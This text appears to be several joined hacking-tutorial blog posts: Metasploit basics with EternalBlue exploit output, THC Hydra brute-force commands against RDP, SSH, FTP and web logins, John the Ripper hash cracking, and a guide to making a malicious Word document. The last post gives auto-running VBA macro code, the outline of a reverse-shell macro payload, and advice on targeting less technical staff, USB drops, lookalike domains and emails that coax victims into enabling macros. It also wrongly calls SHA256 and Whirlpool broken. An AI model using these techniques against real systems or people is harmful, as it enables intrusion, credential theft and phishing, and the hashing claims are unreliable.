┌──(kali㉿kali)-[~] └─$ msfconsole Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... =[ metasploit v6.1.41-dev- ] + -- --=[ 2216 exploits - 1171 auxiliary - 397 post ] + -- --=[ 616 payloads - 45 encoders - 11 nops ] + -- --=[ 9 evasion ]Metasploit tip: Display the Framework log using the log command, learn more with help log msf6 >
Metasploit — msfconsole
Types Of Modules
Auxiliary — Auxiliary tools or modules are tools that don’t necessarily exploit the target host. These tools include scanners, fuzzers, and others. For example, some auxiliary tools can perform user enumeration through various services like SMTP.
Exploit — You can use exploit tools for exploiting a target. A buffer overflow is one example of an exploit tool. Buffer overflows work by sending specially crafted packets to the host. The packet exceeds the amount of data that the target was expecting. This then allows for the execution of additional code.
Post-Exploitation — A post-exploitation tool is just that, it’s a tool that you run against the target once exploited. This could be to gather more information about the target such as finding ways to elevate your privileges on the target.
Payload — Payloads allow you to interact with a target host once it has been exploited. There are many payloads such as reverse TCP shells. One popular payload is Meterpreter. Meterpreter payloads offer advanced functionality.
Searching For Modules
The vast number of tools available through Metasploit is what makes it so powerful. Imagine you’ve just finished scanning a target with Nmap and found that a particular Windows server is vulnerable to MS17–010 (Eternal Blue). Wouldn’t it be great if there was a single place where you could search for tools that could exploit your target? There is, and this is it. Using the search command you can search for specific vulnerabilities and if it has one, it will find it. As you can see from the example below.
msf6 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No 3 auxiliary/scanner/smb/smb_ms17_010 normal No 4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Configuring Modules
While there may be more options than the options I’m about to demonstrate, the options for a tool will have a similar structure. The MS17–010 exploit has a number of options which you can see below. The tool can also be configured with specific payloads. These payloads can be seen by using the show payloads command. Furthermore, some options are specific to the host you’re using. The LHOST and LPORT options are for specifying where you would like reverse shells to connect back to.
Executing Modules
So you have configured your module with the target’s IP address and port. You have selected your payload and are ready to exploit the target. What’s next? In order to run your module, you can use either the run or exploit commands. What’s the difference between run and exploit? none. Run is an alias of exploit. I’ve heard people say that they are different. That run should be used for running auxiliary tools and exploit for exploitation tools. Use whichever command you prefer provided it gets the job done.
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.0.2.15:4444 [*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7
Metasploit — Exploit
Metasploit Sessions
Sessions are ways to manage your connections to various targets. Successfully exploiting a target will automatically create a session. They are particularly useful when you are using multiple modules. For instance, If you have got a meterpreter session opened up but you want to use a post exploitation module then you can use the background command to return to Metasploit while keeping the session active. Furthermore, once you have found a post-exploitation module you can use the set session command to tell it to run against that session. Please see the video at the bottom of the page for a demonstration of using sessions.
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ HARIS-PC 10.10.14.10:4444 -> 10.10.10.40:49161 (10.10.10.40)
Metasploit — Sessions
Metasploit Workspaces
Workspaces are ways to separate your data. For example, if you were targeting two different organizations like the UK Conservative party and The SUN newspaper (Disclaimer — Examples only for comedic effect, this is not a form of encouragement). You would need a way to keep the data separate while you’re working on a way to exploit them. This is where the database comes in. Workspaces utilize the database to logically separate all data into those various workspaces. In order to create a workspace, you need to use the ‘workspace -a name-of-workspace’ command. You can view all your workspaces including your current active workspace by running the ‘workspace’ command. The workspace with the asterisk next to it is your current active workspace. To switch between workspaces just type workspace followed by the workspace name.
Metasploit — Workspaces
Conclusion
There is far more to Metasploit than I have covered in this article. To cover everything would require writing a whole book which many people have done. My aim here is to provide a brief overview of the tool and some of the basic functionality. If I’ve piqued your curiosity then download a fresh copy of Kali Linux or Parrot OS and have a tinker. There are many more features to explore including a friendly web interface. Please remember that attempting to hack into a system that you do not have permission to target will likely land you in a bit of trouble. There are plenty of legal ways to test out these tools in an environment purposely built to do so. Please see my other article on Hacking Legally for more information.
Hello World and welcome to haxez, today we’re talking about the brute forcing tool THC Hydra. According to Wikipedia, Hydra is a parallelized network logon cracker. It is available on a number of Penetration Testing Linux distributions such as Kali Linux, Parrot OS, Black Arch, and BackBox. Hydra has the ability to perform attacks against various different network services including Remote Desktop, Secure Shell, and many others. It is also capable of performing brute force attacks against web applications.
Installing Hydra
Hydra tends to come preinstalled on most penetration testing distributions. However, it can also be installed using apt. If your repositories don’t have Hydra for whatever reason then it can easily be installed from GitHub using git clone.
Installing Hydra
Hydra For Brute Forcing RDP
Remote Desktop Protocol or RDP is a remote management tool primarily used in Windows environments. It uses terminal services to allow users to connect to the target host using the RDP Client. The user will then be presented with a visual representation of the desktop. Furthermore, this will allow them to carry out management tasks. RDP is often attacked by hackers using automated tools like Hydra. Please see below for the syntax on how to attack RDP. The uppercase L specifies the user wordlist, the uppercase P specifies the password wordlist. The lowercase variants will allow you to specify individual words. The -F flag tells Hydra to stop once it has found a correct password. Then we specify the protocol, the IP address, and the verbosity.
SSH or Secure Shell is another remote management protocol. It is found in Linux or Unix environments but has recently been added to Windows. Furthermore, it is considered the successor to telnet. Telnet doesn’t use encryption so everything is transmitted in plaintext. If a threat actor were on your network performing a man-in-the-middle attack, they would be able to see your username and password transmitted to the telnet server. SSH is an encrypted protocol so if traffic was interncepted, it couldn’t be read. You can perform brute force attacks against SSH like so:
FTP is a protocol for transferring files and can also be subject to brute force attacks by Hydra. The syntax will be exactly the same as RDP and SSH. Just replace the protocol for FTP. You will notice a pattern start to emerge for basic network services. There is a lot more to Hydra and you can fine-tune your attacks to be more specific. To perform a brute force attack against FTP:
You can also brute force web applications. However, the syntax to do so is a bit more complicated. You would start as we have done previously by specifying the username and password wordlist. However, you now need to specify the type of web attack whether it’s an “http-post-form” or “http-get-form” or whether it’s using basic authentication. Then you need to specify the path to the file to attack. Next, you need to specify the parameters to attack (username and password). Furthermore, you need to specify placeholders for the user and pass variables. Finally, you need to specify any cookies. You can see an example of this below:
hydra -L users.txt -P password.txt 10.0.2.5 http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
DVWA Brute Force
Graphical User Interface
There is a graphical user interface for Hydra. To launch it you need to run the xhydra command. If you prefer GUI’s then this could be your preferred method of using hydra. Personally I prefer using the command line, I genuinly find it easier to configure than the GUI.
Hello World and welcome to haxez, the game’s afoot and in this post, I’m going to be talking about my favorite password-cracking tool, John The Ripper. John the Ripper is a multi-platform password cracking tool that can crack various password hashes. It was developed by OpenWall and was initially released in 1996. I believe John The Ripper got its name from another hacking tool called Jack The Cracker, or Cracker Jack. Anyway, you’re not here to read a reworded Wikipedia article.
Installing John The Ripper
John The Ripper should come preinstalled on most penetration testing Linux distributions. However, your package manager may have it if your distribution didn’t come with it preinstalled. For Debian-based distributions you can run:
sudo apt-get install john
Installing John The Ripper
If your package manager’s repositories don’t have John then you can install it from GitHub by using Git Clone. Then once it’s installed you can view the documentation by either running john -h or by looking at the man pages.
John The Ripper Features
As mentioned, John can crack a variety of different password hashes. You can see exactly which hashes he can crack by running the list formats command. This command is also helpful when trying to manually specify a hash type. If you’re in an exam and have forgotten how to ask John to crack a raw MD5 hash, then this command could help.
sudo john --list=formats
John The Ripper List Formats
The functionality doesn’t end with mere password cracking though. John has a variety of tools to aid you in the heinous slaughtering of innocent password hashes. These additional tools can normally be found in your /usr/bin or /opt/john/src/ directories. Furthermore, these tools can be used for things like extracting hashes from password-protected ZIP or RAR archives.
Additional John Tools
John The Ripper Cracking Modes
John has a number of different password hash cracking modes. These various modes can be used to crack password hashes in different ways. If one method of cracking a password hash didn’t work, then you could try a different mode.
Wordlist Mode
By far the most common mode I’ve used is the wordlist mode. This mode requires the user to specify a wordlist. This wordlist could be bespoke and created by tools like Crunch. Or it could be one of the many wordlists available on the internet. John will then go through the list line by line attempting to match the hash to the word. This mode also offers a mangle option where it will apply rules to the word. In short, the word password could be automatically mangled to something like P@55W0RD.
Single Crack Mode
As stated on the Openwall (John Developers) website, the single crack mode is the cracking mode you should start with. It will use login names, full names, and user home directory names as candidate passwords. It will then apply a large set of mangling rules. Successfully cracked passwords will also be tried against any other hashes that have been loaded. In theory, this mode should be able to crack a list of password hashes faster than if you were to supply the hashes separately.
Incremental Mode
This mode will try all possible character combinations. This is a powerful mode but would likely take longer than using a wordlist. If it tries all possible character combinations then it would eventually guess the correct password. If you know the length of the password then you can specify it to make cracking quicker. However, if you don’t know the length of the password and the password is a fairly long and complex one, then you could be waiting a while… like forever.
External Mode
From what I’ve read and what I understand, I believe this mode requires you to create your own cracking mode. The program code is a subset of C and would be compiled by John at startup. This could be useful if the hashing algorithm used to create the hash is bespoke. You could then write your own cracking module and load it into john to crack those custom-created hashes.
Identifying Hashes
John The Ripper will automatically attempt to identify the hashes that you give him. However, this can be prone to error. Fortunately, there are plenty of tools out there that you can use to identify password hash types. One such tool is hash-identifier which will come preinstalled or should be installable via your package manager or via cloning it from GitHub. To run the tool you simply type the name and then it will ask you to submit your hash. It will then spit out a list of hash types in the order of likelihood. Then you can use that information to manually tell John what type of hash you want to crack.
Hash Identifier
Getting Wordlists
A question I get asked a lot is where I get my word list from. Well, there are many locations. Most penetration distributions come with a wordlist preinstalled. However, you can download them from the internet. One particular wordlist that I would like to shine a light on is seclists. Seclists is available from GitHub and has almost every type of wordlist you could ever want. For the purposes of this demonstration, I will be using the rockyou.txt wordlist from the rockyou.com data breach.
Seclists
Cracking MD5 Hashes With John The Ripper
As mentioned earlier, John can crack a variety of password hashes. The example below shows how you can crack an MD5 hash. An MD5 Hash or MD5 message-digest algorithm is cryptographically broken but still commonly used. Its a hashing function that produces a 128-bit hash value. MD5 was originally designed by Ronal Rivest in 1991 as a method of replacing MD4 hashes. I used the following syntax to crack the MD5 hash.
sudo john --format=raw-md5 --wordlist=rockyou.txt hash1.txt
John The Ripper Crack MD5 Hash
Cracking SHA1 Hashes With John The Ripper
The next hash that somehow managed to sneak its way into my directory is a SHA1 hash. SHA1 is a cryptographically broken encryption cipher that was originally designed by the National Security Agency. It was initially released in 1993 and produces a 160-bit hash. The following syntax shows how you can crack a SHA1 hash.
sudo john --format=raw-sha1 --wordlist=rockyou.txt hash2.txt
Cracking SHA1 Hashes With John The Ripper
Cracking SHA256 Hashes With John The Ripper
Where did this hash come from? never mind, I’m sure our friend John can dispatch it fairly quickly. SHA256 is another cryptographically broken hashing algorithm that was developed by the National Security Agency (it’s almost as if they were designing them to fail).
sudo john --format=raw-sha256 --wordlist=rockyou.txt hash4.txt
Cracking SHA256 Hashes With John The Ripper
Cracking Whirlpool Hashes With John The Ripper
What’s that? no secret is safe? Well if you use a crappy password and someone is able to obtain your password hash then you aren’t far from the truth. have you considered doing a password audit of your employee’s passwords to ensure they are secure? Maybe now is a good time. The syntax below shows how you can crack Whirlpool hashes. Whirlpool is a broken cryptographic algorithm designed by Vincent Rijmen and was first published in 2000.
sudo john --format=whirlpool --wordlist=rockyou.txt hash4.txt
Cracking Whirlpool Hashes With John The Ripper
Cracking MD4 Hashes With John The Ripper
MD4 hashes are outdated but you would be surprised to see how many organizations still use broken and outdated cryptographic algorithms. MD4 is a cryptographically broken encryption cipher originally developed by Ronal Rivest and first published in 1990. The syntax below shows you how to crack passwords encrypted with MD4 hashing algorithms.
sudo john --format=raw-md4 --wordlist=rockyou.txt hash5.txt
Cracking MD4 Hashes With John The Ripper
John.pot
Did I just rickroll you via password hashes? well yeah, I did and I refused to apologize. This post took me a day to write up and unfortunately you have to deal with the consequences. So, what happens to all the password hashes that get cracked by john? Well, they get stored in a file called john.pot. You can use locate on your system to find this but it is usually located in /root/.john/john.pot. If you’re trying to crack a hash but are getting an error message then it is likely you have already cracked it. Deleted the john.pot file or remove the line with the cracked has in order to re-crack the file.
sudo cat /root/.john/john.pot
John.pot
Conclusions
John The Ripper is a fantastic tool that is near and dear to my heart. Yes, there are alternatives such as Hashcat but this is a mainstay of cybersecurity. It does what it needs to do and provides a simple way of doing it. It is one of my favorite tools for hacking and I will continue using it until it is no longer feasible to do so. I realize I have only scraped the surface on the functionality of John The Ripper but this post isn’t meant for advanced usage, it is merely a guide on how to get started with John The Ripper. So get slaying and let me know how you get on.
Hello world and welcome to haxez, in this post I’m going to be explaining how you can create a malicious Microsoft Office file to hack anyone. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.
Malicious File With Microsoft Office Visual Basic
Microsoft Office applications have a feature that allows them to support Visual Basic programs or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the view tab and click on Macros, then view Macros.
Microsoft Office Visual Basic
Creating A Malicious File Macro In Microsoft Office
With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.
Creating A Macro In Microsoft Office
A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.
Sub THM() MsgBox ("YOU HAS BEEN HAXED!!!") End Sub
Macro In Microsoft Office
Running the Microsoft Office Malicious File Macro
Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.
Running the Microsoft Office Macro
Automatic Macro Execution (sort of)
We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and Auto_Open functions. You also need to specify which function to execute, in our case it is the EvilMacro function. The code will look similar to the snippet below.
Sub Document_Open() EvilMacro End SubSub AutoOpen() EvilMacro End SubSub EvilMacro() MsgBox ("YOU HAS BEEN HAXED!!!") End Sub
Automatic Macro Execution (sort of)
In order for the macro to work, it needs to be saved in a Macro-Enabled format such as .doc and docm. To do this, save the document as a Word 97–2003 Template. Got to File, save Document1 and save as type Word 97–2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.
Popping Programs with Microsoft Office Malicious File
That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.
Sub Document_Open() EvilMacro End SubSub AutoOpen() EvilMacro End SubSub EvilMacro() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
Popping Programs with Microsoft Office
Injecting Some Venom
With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.
Firstly, we need to create a Macro payload to add to our Microsoft Word Document, this can be done using the following msfvenom command and replacing the X’s with your attack boxes IP address and desired port:
Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97–2003 Document.
Injecting Some Venom
Catching The Reverse Shell
The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.
Catching The Reverse Shellsysinfo
Triggering The Payload With Malicious File
When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.
Enable content
Microsoft Office Delivery Methods
The are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success will likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.
USB Delivery
USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.
Web Delivery
Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done but web delivery gives you more flexibility. The victim need only down the file and open it.
Email Delivery
Email delivery is a great option for a delivery technique provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For explain, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected]. Granted it stands out but there are more sneaky ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.
Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.
Conclusion
Ok, the title of this post was clickbait and for that, I apologize. Granted the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such as way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.
